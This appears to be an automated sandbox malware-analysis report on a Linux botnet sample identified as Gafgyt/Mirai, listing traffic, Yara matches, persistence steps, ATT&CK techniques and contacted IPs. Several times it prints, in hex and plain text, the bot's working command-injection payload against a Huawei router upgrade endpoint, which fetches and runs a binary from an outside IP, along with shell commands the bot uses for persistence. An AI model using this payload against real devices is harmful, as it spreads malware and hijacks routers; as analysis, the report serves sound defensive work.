43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
              Source: unknownTCP traffic detected without corresponding DNS query: 172.48.71.199
              Source: unknownTCP traffic detected without corresponding DNS query: 157.140.61.123
              Source: unknownTCP traffic detected without corresponding DNS query: 197.240.88.160
              Source: unknownTCP traffic detected without corresponding DNS query: 41.19.172.198
              Source: unknownTCP traffic detected without corresponding DNS query: 41.23.197.218
              Source: unknownTCP traffic detected without corresponding DNS query: 157.20.100.157
              Source: unknownTCP traffic detected without corresponding DNS query: 157.206.94.17
              Source: unknownTCP traffic detected without corresponding DNS query: 41.226.233.136
              Source: unknownTCP traffic detected without corresponding DNS query: 157.127.3.23
              Source: unknownTCP traffic detected without corresponding DNS query: 197.121.254.179
              Source: unknownTCP traffic detected without corresponding DNS query: 157.74.250.109
              Source: unknownTCP traffic detected without corresponding DNS query: 197.40.73.153
              Source: unknownTCP traffic detected without corresponding DNS query: 134.83.64.211
              Source: unknownTCP traffic detected without corresponding DNS query: 41.83.16.170
              Source: unknownTCP traffic detected without corresponding DNS query: 197.203.101.217
              Source: unknownTCP traffic detected without corresponding DNS query: 197.243.32.149
              Source: unknownTCP traffic detected without corresponding DNS query: 48.254.205.245
              Source: unknownTCP traffic detected without corresponding DNS query: 41.186.63.207
              Source: unknownTCP traffic detected without corresponding DNS query: 197.102.3.100
              Source: unknownTCP traffic detected without corresponding DNS query: 78.88.48.25
              Source: unknownTCP traffic detected without corresponding DNS query: 182.182.121.123
              Source: unknownTCP traffic detected without corresponding DNS query: 157.179.102.31
              Source: unknownTCP traffic detected without corresponding DNS query: 101.184.84.152
              Source: unknownTCP traffic detected without corresponding DNS query: 197.131.244.6
              Source: unknownTCP traffic detected without corresponding DNS query: 197.32.103.147
              Source: unknownTCP traffic detected without corresponding DNS query: 41.120.24.170
              Source: unknownTCP traffic detected without corresponding DNS query: 41.122.188.124
              Source: unknownTCP traffic detected without corresponding DNS query: 41.90.65.156
              Source: unknownTCP traffic detected without corresponding DNS query: 41.106.165.108
              Source: unknownTCP traffic detected without corresponding DNS query: 9.177.81.147
              Source: unknownTCP traffic detected without corresponding DNS query: 102.254.17.249
              Source: unknownTCP traffic detected without corresponding DNS query: 51.63.195.100
              Source: unknownTCP traffic detected without corresponding DNS query: 157.220.141.106
              Source: unknownTCP traffic detected without corresponding DNS query: 197.36.48.54
              Source: unknownTCP traffic detected without corresponding DNS query: 157.108.157.134
              Source: unknownTCP traffic detected without corresponding DNS query: 41.232.191.100
              Source: unknownTCP traffic detected without corresponding DNS query: 41.144.194.128
              Source: unknownTCP traffic detected without corresponding DNS query: 157.81.21.130
              Source: unknownTCP traffic detected without corresponding DNS query: 157.220.136.16
              Source: unknownTCP traffic detected without corresponding DNS query: 41.107.127.238
              Source: unknownTCP traffic detected without corresponding DNS query: 41.114.202.144
              Source: unknownTCP traffic detected without corresponding DNS query: 51.251.230.240
              Source: unknownTCP traffic detected without corresponding DNS query: 197.88.254.0
              Source: unknownTCP traffic detected without corresponding DNS query: 168.100.76.1
              Source: unknownTCP traffic detected without corresponding DNS query: 48.161.11.245
              Source: unknownTCP traffic detected without corresponding DNS query: 41.12.122.129
              Source: unknownTCP traffic detected without corresponding DNS query: 197.70.12.236
              Source: unknownTCP traffic detected without corresponding DNS query: 121.221.89.180
              Source: unknownTCP traffic detected without corresponding DNS query: 197.145.28.44
              Source: k8CCRUs7Yi.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: k8CCRUs7Yi.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 32 32 34 2e 31 33 31 2e 32 33 30 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: unknownDNS traffic detected: queries for: BC@^]B

              System Summary

              barindex
              Source: k8CCRUs7Yi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6232.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 6243.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: k8CCRUs7Yi.elf PID: 6232, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: k8CCRUs7Yi.elf PID: 6243, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: ELF static info symbol of initial sampleName: attack.c
              Source: ELF static info symbol of initial sampleName: attack_get_opt_int
              Source: ELF static info symbol of initial sampleName: attack_get_opt_ip
              Source: ELF static info symbol of initial sampleName: attack_init
              Source: ELF static info symbol of initial sampleName: attack_kill_all
              Source: ELF static info symbol of initial sampleName: attack_method_nudp
              Source: ELF static info symbol of initial sampleName: attack_method_stdhex
              Source: ELF static info symbol of initial sampleName: attack_method_tcp
              Source: ELF static info symbol of initial sampleName: attack_ongoing
              Source: ELF static info symbol of initial sampleName: attack_parse
              Source: k8CCRUs7Yi.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6232.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 6243.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: k8CCRUs7Yi.elf PID: 6232, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: k8CCRUs7Yi.elf PID: 6243, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: k8CCRUs7Yi.elfELF static info symbol of initial sample: __gnu_unwind_execute
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.224.131.230 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial sampleString containing 'busybox' found: bin/busybox
              Source: Initial sampleString containing 'busybox' found: /bin/busybox
              Source: Initial sampleString containing 'busybox' found: f%s:%dwebservbinbin/busyboxbin/watchdogbin/systemd/bin/busybox/bin/watchdog/bin/systemdp
              Source: classification engineClassification label: mal96.troj.linELF@0/0@105/0

              Persistence and Installation Behavior

              barindex
              Source: /bin/sh (PID: 6239)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4
              Source: /bin/sh (PID: 6237)Mkdir executable: /usr/bin/mkdir -> mkdir bin
              Source: /bin/sh (PID: 6239)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4
              Source: /tmp/k8CCRUs7Yi.elf (PID: 6234)Shell command executed: /bin/sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv /tmp/k8CCRUs7Yi.elf bin/watchdog; chmod 777 bin/watchdog\\xfb\\xfe\\xff\\x8c\\xfb\\xfe\\xff\\x90\\xa4"
              Source: /bin/sh (PID: 6236)Rm executable: /usr/bin/rm -> rm -rf bin/watchdog
              Source: submitted sampleStderr: chmod: cannot access 'bin/watchdog'$'\373\376\377\214\373\376\377\220\244\002': No such file or directory: exit code = 0

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: unknownNetwork traffic detected: HTTP traffic on port 38784 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 36752 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 36752
              Source: unknownNetwork traffic detected: HTTP traffic on port 55690 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 53818 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 47280 -> 37215
              Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 47280
              Source: unknownNetwork traffic detected: HTTP traffic on port 38110 -> 37215
              Source: /tmp/k8CCRUs7Yi.elf (PID: 6232)Queries kernel information via 'uname':
              Source: k8CCRUs7Yi.elf, 6232.1.00005579de727000.00005579de855000.rw-.sdmp, k8CCRUs7Yi.elf, 6243.1.00005579de727000.00005579de855000.rw-.sdmpBinary or memory string: yU!/etc/qemu-binfmt/arm
              Source: k8CCRUs7Yi.elf, 6232.1.00007ffe84fea000.00007ffe8500b000.rw-.sdmp, k8CCRUs7Yi.elf, 6243.1.00007ffe84fea000.00007ffe8500b000.rw-.sdmpBinary or memory string: "x86_64/usr/bin/qemu-arm/tmp/k8CCRUs7Yi.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/k8CCRUs7Yi.elf
              Source: k8CCRUs7Yi.elf, 6232.1.00005579de727000.00005579de855000.rw-.sdmp, k8CCRUs7Yi.elf, 6243.1.00005579de727000.00005579de855000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
              Source: k8CCRUs7Yi.elf, 6232.1.00007ffe84fea000.00007ffe8500b000.rw-.sdmp, k8CCRUs7Yi.elf, 6243.1.00007ffe84fea000.00007ffe8500b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: k8CCRUs7Yi.elf, type: SAMPLE
              Source: Yara matchFile source: 6232.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6243.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: k8CCRUs7Yi.elf, type: SAMPLE
              Source: Yara matchFile source: 6232.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6243.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: k8CCRUs7Yi.elf PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: k8CCRUs7Yi.elf PID: 6243, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: k8CCRUs7Yi.elf, type: SAMPLE
              Source: Yara matchFile source: 6232.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6243.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: k8CCRUs7Yi.elf, type: SAMPLE
              Source: Yara matchFile source: 6232.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6243.1.00007f281c017000.00007f281c02d000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: k8CCRUs7Yi.elf PID: 6232, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: k8CCRUs7Yi.elf PID: 6243, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Scripting
              Path InterceptionPath Interception1
              Masquerading
              OS Credential Dumping11
              Security Software Discovery
              Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
              Encrypted Channel
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              File and Directory Permissions Modification
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
              Non-Standard Port
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
              Scripting
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              File Deletion
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830800 Sample: k8CCRUs7Yi.elf Startdate: 20/03/2023 Architecture: LINUX Score: 96 27 157.182.56.30, 37215 WVUUS United States 2->27 29 157.182.56.46 WVUUS United States 2->29 31 99 other IPs or domains 2->31 33 Snort IDS alert for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 5 other signatures 2->39 8 k8CCRUs7Yi.elf 2->8         started        signatures3 process4 process5 10 k8CCRUs7Yi.elf sh 8->10         started        12 k8CCRUs7Yi.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 sh mv 10->21         started        23 k8CCRUs7Yi.elf 12->23         started        25 k8CCRUs7Yi.elf 12->25         started        signatures7 41 Sets full permissions to files and/or directories 14->41
              SourceDetectionScannerLabelLink
              k8CCRUs7Yi.elf56%ReversingLabsLinux.Trojan.Mirai
              k8CCRUs7Yi.elf48%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/k8CCRUs7Yi.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/k8CCRUs7Yi.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  197.210.172.219
                  unknownNigeria
                  29465VCG-ASNGfalse
                  197.0.2.50
                  unknownTunisia
                  37705TOPNETTNfalse
                  41.185.108.115
                  unknownSouth Africa
                  36943GridhostZAfalse
                  41.235.61.9
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  188.36.242.138
                  unknownHungary
                  5483MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHUfalse
                  41.195.197.43
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  149.237.153.9
                  unknownGermany
                  12843TELEMAXXDEfalse
                  41.127.73.189
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  197.166.154.51
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  157.245.182.53
                  unknownUnited States
                  14061DIGITALOCEAN-ASNUSfalse
                  197.153.36.4
                  unknownMorocco
                  36925ASMediMAfalse
                  41.37.208.121
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  197.31.187.197
                  unknownTunisia
                  37492ORANGE-TNfalse
                  197.225.251.131
                  unknownMauritius
                  23889MauritiusTelecomMUfalse
                  41.101.160.208
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  41.57.220.73
                  unknownGhana
                  37103BUSYINTERNETGHfalse
                  97.30.206.138
                  unknownUnited States
                  22394CELLCOUSfalse
                  95.57.208.75
                  unknownKazakhstan
                  9198KAZTELECOM-ASKZfalse
                  157.222.204.85
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  159.74.183.119
                  unknownUnited States
                  1257TELE2EUfalse
                  41.29.92.239
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  157.74.250.109
                  unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                  157.87.184.61
                  unknownUnited States
                  21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                  41.241.171.238
                  unknownSudan
                  36998SDN-MOBITELSDfalse
                  157.159.2.23
                  unknownFrance
                  2094FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudParifalse
                  41.97.193.147
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  197.84.139.255
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  157.84.108.140
                  unknownUnited Kingdom
                  2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                  41.41.240.214
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  157.22.104.166
                  unknownUnited States
                  397379NLN-ASN-01USfalse
                  25.246.88.170
                  unknownUnited Kingdom
                  199055UKCLOUD-ASGBfalse
                  197.89.147.89
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  204.176.93.89
                  unknownUnited States
                  701UUNETUSfalse
                  197.47.50.230
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  157.75.104.134
                  unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                  141.67.194.206
                  unknownGermany
                  680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesefalse
                  192.51.188.240
                  unknownChina
                  136038HDTIDCCLOUD-AS-APHDTIDCLIMITEDHKfalse
                  23.137.159.52
                  unknownReserved
                  397656INFOSEC-ENTERPRISES-LLCUSfalse
                  197.73.207.28
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  197.8.107.197
                  unknownTunisia
                  5438ATI-TNfalse
                  41.15.176.228
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  197.11.215.229
                  unknownTunisia
                  5438ATI-TNfalse
                  197.237.113.171
                  unknownKenya
                  15399WANANCHI-KEfalse
                  41.123.104.154
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  112.1.125.104
                  unknownChina
                  56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
                  157.20.21.155
                  unknownunknown
                  24297FCNUniversityPublicCorporationOsakaJPfalse
                  41.172.220.44
                  unknownSouth Africa
                  36937Neotel-ASZAfalse
                  71.17.15.181
                  unknownCanada
                  803SASKTELCAfalse
                  41.212.241.75
                  unknownMauritius
                  23889MauritiusTelecomMUfalse
                  157.200.4.53
                  unknownFinland
                  1759TSF-IP-CORETeliaFinlandOyjEUfalse
                  157.210.167.248
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  32.96.114.0
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  197.108.245.191
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  157.247.33.238
                  unknownAustria
                  8447TELEKOM-ATA1TelekomAustriaAGATfalse
                  41.214.134.104
                  unknownMorocco
                  36925ASMediMAfalse
                  41.8.13.54
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  157.94.185.59
                  unknownFinland
                  51164CYBERCOM-FICybercomFinlandOyFIfalse
                  91.184.172.129
                  unknownGermany
                  9063SAARGATE-ASVSENETGmbHDEfalse
                  157.182.56.30
                  unknownUnited States
                  12118WVUUSfalse
                  197.130.149.43
                  unknownMorocco
                  6713IAM-ASMAfalse
                  41.110.99.208
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  157.180.86.150
                  unknownSweden
                  22192SSHENETUSfalse
                  197.165.32.75
                  unknownEgypt
                  24863LINKdotNET-ASEGfalse
                  65.170.138.29
                  unknownUnited States
                  1239SPRINTLINKUSfalse
                  195.232.253.86
                  unknownGermany
                  12663VODAFONE-GROUPITfalse
                  203.214.124.37
                  unknownAustralia
                  7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                  122.121.166.38
                  unknownTaiwan; Republic of China (ROC)
                  3462HINETDataCommunicationBusinessGroupTWfalse
                  41.227.18.96
                  unknownTunisia
                  2609TN-BB-ASTunisiaBackBoneASTNfalse
                  168.57.1.121
                  unknownUnited States
                  1761TDIR-CAPNETUSfalse
                  157.52.55.213
                  unknownUnited States
                  63394EIDG-AS1USfalse
                  41.246.244.11
                  unknownSouth Africa
                  5713SAIX-NETZAfalse
                  41.9.179.7
                  unknownSouth Africa
                  29975VODACOM-ZAfalse
                  197.26.154.201
                  unknownTunisia
                  37492ORANGE-TNfalse
                  197.84.96.119
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  27.12.165.56
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  157.217.40.254
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  41.219.71.247
                  unknownNamibia
                  37009MTCASNNAfalse
                  197.245.175.177
                  unknownSouth Africa
                  11845Vox-TelecomZAfalse
                  41.239.143.144
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  181.122.141.219
                  unknownParaguay
                  23201TelecelSAPYfalse
                  41.184.118.254
                  unknownNigeria
                  29091IPNXngNGfalse
                  157.182.56.46
                  unknownUnited States
                  12118WVUUSfalse
                  179.191.14.210
                  unknownBrazil
                  263314ATALINKTELECOMUNICACOESBRfalse
                  157.21.225.93
                  unknownUnited States
                  53446EVMSUSfalse
